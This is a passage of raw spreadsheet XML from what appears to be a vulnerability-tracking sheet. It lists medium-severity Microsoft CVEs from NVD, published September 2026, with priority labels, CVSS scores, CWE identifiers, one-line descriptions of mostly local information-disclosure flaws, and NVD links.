t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t></is></c></row><row r="1261"><c r="A1261" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1261" s="5" t="inlineStr"><is><t>CVE-2026-69345</t></is></c><c r="D1261" s="5" t="n"><v>5.5</v></c><c r="E1261" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1261" s="5" t="inlineStr" /><c r="H1261" s="5" t="n"><v>0.004</v></c><c r="I1261" s="5" t="inlineStr" /><c r="J1261" s="5" t="inlineStr" /><c r="K1261" s="5" t="inlineStr" /><c r="L1261" s="5" t="inlineStr" /><c r="M1261" s="5" t="inlineStr" /><c r="N1261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1261" s="5" t="inlineStr" /><c r="R1261" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1261" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69345</t></is></c></row><row r="1262"><c r="A1262" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1262" s="5" t="inlineStr"><is><t>CVE-2026-69351</t></is></c><c r="D1262" s="5" t="n"><v>5.5</v></c><c r="E1262" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1262" s="5" t="inlineStr" /><c r="H1262" s="5" t="n"><v>0.005</v></c><c r="I1262" s="5" t="inlineStr" /><c r="J1262" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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62" s="5" t="inlineStr" /><c r="M1262" s="5" t="inlineStr" /><c r="N1262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1262" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1262" s="5" t="inlineStr" /><c r="R1262" s="5" t="inlineStr"><is><t>CWE-359</t></is></c><c r="S1262" s="5" t="inlineStr"><is><t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t></is></c></row><row r="1263"><c r="A1263" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1263" s="5" t="inlineStr"><is><t>CVE-2026-69353</t></is></c><c r="D1263" s="5" t="n"><v>5.5</v></c><c r="E1263" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1263" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1263" s="5" t="inlineStr" /><c r="H1263" s="5" t="n"><v>0.004</v></c><c r="I1263" s="5" t="inlineStr" /><c r="J1263" s="5" t="inlineStr" /><c r="K1263" s="5" t="inlineStr" /><c r="L1263" s="5" t="inlineStr" /><c r="M1263" s="5" t="inlineStr" /><c r="N1263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1263" s="5" t="inlineStr" /><c r="R1263" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1263" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Text Shaping allows an authorized attacker to disclose information locally.</t></is></c><c r="T1263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69353</t></is></c></row><row r="1264"><c r="A1264" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1264" s="5" t="inlineStr"><is><t>CVE-2026-69367</t></is></c><c r="D1264" s="5" t="n"><v>5.5</v></c><c r="E1264" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1264" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1264" s="5" t="inlineStr" /><c r="H1264" s="5" t="n"><v>0.004</v></c><c r="I1264" s="5" t="inlineStr" /><c r="J1264" s="5" t="inlineStr" /><c r="K1264" s="5" t="inlineStr" /><c r="L1264" s="5" t="inlineStr" /><c r="M1264" s="5" t="inlineStr" /><c r="N1264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1264" s="5" t="inlineStr" /><c r="R1264" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1264" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69367</t></is></c></row><row r="1265"><c r="A1265" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1265" s="5" t="inlineStr"><is><t>CVE-2026-69369</t></is></c><c r="D1265" s="5" t="n"><v>5.5</v></c><c r="E1265" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1265" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1265" s="5" t="inlineStr" /><c r="H1265" s="5" t="n"><v>0.003</v></c><c r="I1265" s="5" t="inlineStr" /><c r="J1265" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1265" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1265" s="5" t="inlineStr" /><c r="M1265" s="5" t="inlineStr" /><c r="N1265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1265" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1265" s="5" t="inlineStr" /><c r="R1265" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1265" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t></is></c></row><row r="1266"><c r="A1266" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1266" s="5" t="inlineStr"><is><t>CVE-2026-69376</t></is></c><c r="D1266" s="5" t="n"><v>5.5</v></c><c r="E1266" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1266" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1266" s="5" t="inlineStr" /><c r="H1266" s="5" t="n"><v>0.004</v></c><c r="I1266" s="5" t="inlineStr" /><c r="J1266" s="5" t="inlineStr" /><c r="K1266" s="5" t="inlineStr" /><c r="L1266" s="5" t="inlineStr" /><c r="M1266" s="5" t="inlineStr" /><c r="N1266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1266" s="5" t="inlineStr" /><c r="R1266" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1266" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69376</t></is></c></row><row r="1267"><c r="A1267" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1267" s="5" t="inlineStr"><is><t>CVE-2026-69390</t></is></c><c r="D1267" s="5" t="n"><v>5.5</v></c><c r="E1267" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1267" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1267" s="5" t="inlineStr" /><c r="H1267" s="5" t="n"><v>0.004</v></c><c r="I1267" s="5" t="inlineStr" /><c r="J1267" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1267"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67" s="5" t="inlineStr" /><c r="M1267" s="5" t="inlineStr" /><c r="N1267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1267" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1267" s="5" t="inlineStr" /><c r="R1267" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1267" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="T1267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t></is></c></row><row r="1268"><c r="A1268" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1268" s="5" t="inlineStr"><is><t>CVE-2026-69403</t></is></c><c r="D1268" s="5" t="n"><v>5.5</v></c><c r="E1268" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1268" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1268" s="5" t="inlineStr" /><c r="H1268" s="5" t="n"><v>0.003</v></c><c r="I1268" s="5" t="inlineStr" /><c r="J1268" s="5" t="inlineStr" /><c r="K1268" s="5" t="inlineStr" /><c r="L1268" s="5" t="inlineStr" /><c r="M1268" s="5" t="inlineStr" /><c r="N1268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1268" s="5" t="inlineStr" /><c r="R1268" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1268" s="5" t="inlineStr"><is><t>Missing authorization in Windows SMB Server allows an authorized attacker to disclose information locally.</t></is></c><c r="T1268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69403</t></is></c></row><row r="1269"><c r="A1269" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1269" s="5" t="inlineStr"><is><t>CVE-2026-69406</t></is></c><c r="D1269" s="5" t="n"><v>5.5</v></c><c r="E1269" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1269" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1269" s="5" t="inlineStr" /><c r="H1269" s="5" t="n"><v>0.005</v></c><c r="I1269" s="5" t="inlineStr" /><c r="J1269" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K126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69" s="5" t="inlineStr" /><c r="M1269" s="5" t="inlineStr" /><c r="N1269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1269" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1269" s="5" t="inlineStr" /><c r="R1269" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1269" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t></is></c><c r="T1269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t></is></c></row><row r="1270"><c r="A1270" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1270" s="5" t="inlineStr"><is><t>CVE-2026-69453</t></is></c><c r="D1270" s="5" t="n"><v>5.5</v></c><c r="E1270" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1270" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1270" s="5" t="inlineStr" /><c r="H1270" s="5" t="n"><v>0.003</v></c><c r="I1270" s="5" t="inlineStr" /><c r="J1270" s="5" t="inlineStr" /><c r="K1270" s="5" t="inlineStr" /><c r="L1270" s="5" t="inlineStr" /><c r="M1270" s="5" t="inlineStr" /><c r="N1270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1270" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1270" s="5" t="inlineStr" /><c r="R1270" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1270" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69453</t></is></c></row><row r="1271"><c r="A1271" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1271" s="5" t="inlineStr"><is><t>CVE-2026-69457</t></is></c><c r="D1271" s="5" t="n"><v>5.5</v></c><c r="E1271" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1271" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1271" s="5" t="inlineStr" /><c r="H1271" s="5" t="n"><v>0.004</v></c><c r="I1271" s="5" t="inlineStr" /><c r="J1271" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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1" s="5" t="inlineStr" /><c r="M1271" s="5" t="inlineStr" /><c r="N1271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1271" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1271" s="5" t="inlineStr" /><c r="R1271" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1271" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69457</t></is></c></row><row r="1272"><c r="A1272" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1272" s="5" t="inlineStr"><is><t>CVE-2026-69504</t></is></c><c r="D1272" s="5" t="n"><v>5.5</v></c><c r="E1272" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1272" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1272" s="5" t="inlineStr" /><c r="H1272" s="5" t="n"><v>0.004</v></c><c r="I1272" s="5" t="inlineStr" /><c r="J1272" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1272"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2" s="5" t="inlineStr" /><c r="M1272" s="5" t="inlineStr" /><c r="N1272" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1272" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1272" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1272" s="5" t="inlineStr" /><c r="R1272" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1272" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1272" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69504</t></is></c></row><row r="1273"><c r="A1273" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1273" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1273" s="5" t="inlineStr"><is><t>CVE-2026-69527</t></is></c><c r="D1273" s="5" t="n"><v>5.5</v></c><c r="E1273" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1273" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1273" s="5" t="inlineStr" /><c r="H1273" s="5" t="n"><v>0.004</v></c><c r="I1273" s="5" t="inlineStr" /><c r="J1273" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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3" s="5" t="inlineStr" /><c r="M1273" s="5" t="inlineStr" /><c r="N1273" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1273" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1273" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1273" s="5" t="inlineStr" /><c r="R1273" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1273" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Mass Storage Class Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="T1273" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69527</t></is></c></row><row r="1274"><c r="A1274" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1274" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1274" s="5" t="inlineStr"><is><t>CVE-2026-69531</t></is></c><c r="D1274" s="5" t="n"><v>5.5</v></c><c r="E1274" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1274" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1274" s="5" t="inlineStr" /><c r="H1274" s="5" t="n"><v>0.003</v></c><c r="I1274" s="5" t="inlineStr" /><c r="J1274" s="5" t="inlineStr" /><c r="K1274" s="5" t="inlineStr" /><c r="L1274" s="5" t="inlineStr" /><c r="M1274" s="5" t="inlineStr" /><c r="N1274" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1274" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1274" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1274" s="5" t="inlineStr" /><c r="R1274" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S1274" s="5" t="inlineStr"><is><t>Unintended proxy or intermediary ('confused deputy') in Microsoft Windows Speech allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1274" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69531</t></is></c></row><row r="1275"><c r="A1275" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1275" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1275" s="5" t="inlineStr"><is><t>CVE-2026-69554</t></is></c><c r="D1275" s="5" t="n"><v>5.5</v></c><c r="E1275" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1275" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1275" s="5" t="inlineStr" /><c r="H1275" s="5" t="n"><v>0.003</v></c><c r="I1275" s="5" t="inlineStr" /><c r="J1275" s="5" t="inlineStr" /><c r="K1275" s="5" t="inlineStr" /><c r="L1275" s="5" t="inlineStr" /><c r="M1275" s="5" t="inlineStr" /><c r="N1275" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1275" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1275" s="5" t="inlineStr" /><c r="R1275" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1275" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Microsoft Windows Search Component allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1275" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69554</t></is></c></row><row r="1276"><c r="A1276" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1276" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1276" s="5" t="inlineStr"><is><t>CVE-2026-69568</t></is></c><c r="D1276" s="5" t="n"><v>5.5</v></c><c r="E1276" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1276" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1276" s="5" t="inlineStr" /><c r="H1276" s="5" t="n"><v>0.004</v></c><c r="I1276" s="5" t="inlineStr" /><c r="J1276" s="5" t="inlineStr" /><c r="K1276" s="5" t="inlineStr" /><c r="L1276" s="5" t="inlineStr" /><c r="M1276" s="5" t="inlineStr" /><c r="N1276" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1276" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1276" s="5" t="inlineStr" /><c r="R1276" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1276" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Spaces Controller allows an authorized attacker to disclose information locally.</t></is></c><c r="T1276" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69568</t></is></c></row><row r="1277"><c r="A1277" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1277" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1277" s="5" t="inlineStr"><is><t>CVE-2026-69609</t></is></c><c r="D1277" s="5" t="n"><v>5.5</v></c><c r="E1277" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1277" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1277" s="5" t="inlineStr" /><c r="H1277" s="5" t="n"><v>0.004</v></c><c r="I1277" s="5" t="inlineStr" /><c r="J1277" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K127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7" s="5" t="inlineStr" /><c r="M1277" s="5" t="inlineStr" /><c r="N1277" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1277" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1277" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1277" s="5" t="inlineStr" /><c r="R1277" s="5" t="inlineStr"><is><t>CWE-125, CWE-193</t></is></c><c r="S1277" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="T1277" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69609</t></is></c></row><row r="1278"><c r="A1278" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1278" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1278" s="5" t="inlineStr"><is><t>CVE-2026-69616</t></is></c><c r="D1278" s="5" t="n"><v>5.5</v></c><c r="E1278" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1278" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1278" s="5" t="inlineStr" /><c r="H1278" s="5" t="n"><v>0.004</v></c><c r="I1278" s="5" t="inlineStr" /><c r="J1278" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1278"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78" s="5" t="inlineStr" /><c r="M1278" s="5" t="inlineStr" /><c r="N1278" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1278" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1278" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1278" s="5" t="inlineStr" /><c r="R1278" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1278" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Services allows an authorized attacker to disclose information locally.</t></is></c><c r="T1278" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69616</t></is></c></row><row r="1279"><c r="A1279" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1279" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1279" s="5" t="inlineStr"><is><t>CVE-2026-69618</t></is></c><c r="D1279" s="5" t="n"><v>5.5</v></c><c r="E1279" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1279" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1279" s="5" t="inlineStr" /><c r="H1279" s="5" t="n"><v>0.004</v></c><c r="I1279" s="5" t="inlineStr" /><c r="J1279" s="5" t="inlineStr" /><c r="K1279" s="5" t="inlineStr" /><c r="L1279" s="5" t="inlineStr" /><c r="M1279" s="5" t="inlineStr" /><c r="N1279" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1279" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1279" s="5" t="inlineStr" /><c r="R1279" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1279" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows SMB Client allows an authorized attacker to disclose information locally.</t></is></c><c r="T1279" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69618</t></is></c></row><row r="1280"><c r="A1280" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1280" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1280" s="5" t="inlineStr"><is><t>CVE-2026-69627</t></is></c><c r="D1280" s="5" t="n"><v>5.5</v></c><c r="E1280" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1280" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1280" s="5" t="inlineStr" /><c r="H1280" s="5" t="n"><v>0.004</v></c><c r="I1280" s="5" t="inlineStr" /><c r="J1280" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K128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80" s="5" t="inlineStr" /><c r="M1280" s="5" t="inlineStr" /><c r="N1280" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1280" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1280" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1280" s="5" t="inlineStr" /><c r="R1280" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1280" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Remote Desktop Licensing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1280" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69627</t></is></c></row><row r="1281"><c r="A1281" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1281" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1281" s="5" t="inlineStr"><is><t>CVE-2026-69672</t></is></c><c r="D1281" s="5" t="n"><v>5.5</v></c><c r="E1281" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1281" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1281" s="5" t="inlineStr" /><c r="H1281" s="5" t="n"><v>0.004</v></c><c r="I1281" s="5" t="inlineStr" /><c r="J1281" s="5" t="inlineStr" /><c r="K1281" s="5" t="inlineStr" /><c r="L1281" s="5" t="inlineStr" /><c r="M1281" s="5" t="inlineStr" /><c r="N1281" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1281" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1281" s="5" t="inlineStr" /><c r="R1281" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1281" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows DNS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1281" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69672</t></is></c></row><row r="1282"><c r="A1282" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1282" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1282" s="5" t="inlineStr"><is><t>CVE-2026-69674</t></is></c><c r="D1282" s="5" t="n"><v>5.5</v></c><c r="E1282" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1282" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1282" s="5" t="inlineStr" /><c r="H1282" s="5" t="n"><v>0.003</v></c><c r="I1282" s="5" t="inlineStr" /><c r="J1282" s="5" t="inlineStr" /><c r="K1282" s="5" t="inlineStr" /><c r="L1282" s="5" t="inlineStr" /><c r="M1282" s="5" t="inlineStr" /><c r="N1282" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1282" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1282" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1282" s="5" t="inlineStr" /><c r="R1282" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1282" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Modern Device Management (MDM) allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1282" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69674</t></is></c></row><row r="1283"><c 